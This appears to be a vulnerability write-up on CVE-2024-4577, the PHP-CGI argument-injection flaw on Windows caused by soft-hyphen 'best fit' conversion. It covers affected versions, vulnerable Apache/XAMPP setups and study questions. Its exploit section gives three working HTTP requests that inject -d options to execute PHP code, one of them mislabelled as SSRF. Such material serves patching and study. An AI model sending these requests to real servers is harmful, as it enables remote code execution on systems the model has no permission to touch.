PHP CGI RCE (CVE-2024-4577)

The PHP programming language, during its design, neglected the Best-Fit character encoding conversion feature inherent in Windows operating systems. This oversight allows unauthenticated attackers to bypass protections from the old CVE-2012-1823 by using specific character sequences to perform attacks such as parameter injection, subsequently executing arbitrary code on remote PHP servers.

Scope of Impact This vulnerability affects all PHP versions installed on Windows operating systems. For detailed information, refer to the table below:

• PHP 8.3 < 8.3.8

• PHP 8.2 < 8.2.20

• PHP 8.1 < 8.1.29

How to Determine if You Are Vulnerable to Attack?

For common setups involving the Apache HTTP Server combined with PHP, website administrators can confirm whether their server is vulnerable using the two methods listed in this article. Notably, Scenario Two is also the default setting during the installation of XAMPP for Windows, implying that all versions of XAMPP for Windows are inherently affected by this vulnerability.

At the time of writing this article, it has been verified that unauthorized attackers can execute arbitrary code on remote servers running Windows operating systems in the following language environments:

• Traditional Chinese (Code page 950)

• Simplified Chinese (Code page 936)

• Japanese (Code page 932)

For other Windows operating systems operating in English, Korean, and Western European languages, due to the extensive use of PHP and the inability to comprehensively list and rule out all exploitable scenarios, it is still recommended that users thoroughly inventory their assets, verify usage scenarios, and update PHP to the latest version to ensure maximum security.

Evil Soft Hyphen

A soft hyphen (represented in HTML as ­) is an invisible character used to indicate an optional hyphenation point within a line of text. In web development, the soft hyphen is often used in long words or URLs to allow for automatic line breaks at the edge of the display without altering the actual content or meaning of the text.

What is Common gateway Interface?

The Common Gateway Interface (CGI) is a standard protocol that defines how web servers can interact with executable programs installed on a server that generate web pages dynamically. Such programs are called CGI scripts; they can be written in any programming language, including PHP.

In the context of PHP and web development, CGI acts as a bridge between the PHP script and the web server, allowing the server to pass data, like form inputs or request details, to the PHP script. The PHP script processes this data and sends back the generated HTML (or other data types) to the server, which then sends it to the client's browser.

Example:

querystrings are parsed and passed to the PHP interpreter on the command line - a request such as as http://host/cgi.php?foo=bar might be executed as php.exe -cgi.php foo=bar

So what?

Here are two invocations of php.exe, one malicious and one benign. Can you spot the difference?

one of them is soft hyphen(0xAD) and one of them is "dash"(0x2D)

While they both appear the same to you and me, they have vastly different meanings to the OS.

Best fit mapping

PHP will apply what’s known as a ‘best fit’ mapping, and helpfully assume that, when the user entered a soft hyphen, they actually intended to type a real hyphen, and interpret it as such. Herein lies our vulnerability - if we supply a CGI handler with a soft hyphen (0xAD), the CGI handler won’t feel the need to escape it, and will pass it to PHP. PHP, however, will interpret it as if it were a real hyphen, which allows an attacker to sneak extra command line arguments, which begin with hyphens, into the PHP process.

Scenario One: Setting PHP to run under CGI mode In the Apache Httpd configuration file

when HTTP requests are directed to the PHP-CGI executable using the Action directive, this setup is affected by the vulnerability. Common configurations include, but are not limited to:

AddHandler cgi-script .php
Action cgi-script "/cgi-bin/php-cgi.exe"

or

<FilesMatch "\.php$">
    SetHandler application/x-httpd-php-cgi
</FilesMatch>

Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"

Scenario Two: Exposing the PHP executable to the public (Default installation setting in XAMPP)

Even if PHP is not configured to run under CGI mode, simply exposing the PHP executable in the CGI directory also subjects it to this vulnerability. Common situations include, but are not limited to:

• Copying php.exe or php-cgi.exe to the /cgi-bin/ directory.

• Exposing the PHP installation directory externally through ScriptAlias, such as:

ScriptAlias /php-cgi/ "C:/xampp/php/"

Different type of EXP

EXP 1

SSRF

http://PhpVulnEnv/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"

EXP 2

POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpVulnEnv

<?php phpinfo();?>

EXP 3

POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpVulnEnv
REDIRECT-STATUS: XCANWIN

<?php phpinfo();?>

Demo

8MB

CVE Demo.mp4

Demo Video

Interview Question

1) Why is XAMPP being infected the most in this CVE?

2) What is best fit mapping how it cause this Vulnerability?

3) Which setting you have to modify to fix this issue?

Author

Ikonw

Reference

https://mp.weixin.qq.com/mp/wappoc_appmsgcaptcha?poc_token=HFj3amajFr1bUBstRri7lGhHA70Gus9G7sywHr1p&target_url=https%3A%2F%2Fmp.weixin.qq.com%2Fs%2F93TuxZ4AVqHXcnJw3M4hRg

No Way, PHP Strikes Again! (CVE-2024-4577)watchTowr Labs - Blog

資安通報：PHP 遠端程式碼執行 (CVE-2024-4577) - PHP CGI 參數注入弱點 | DEVCORE 戴夫寇爾DEVCORE 戴夫寇爾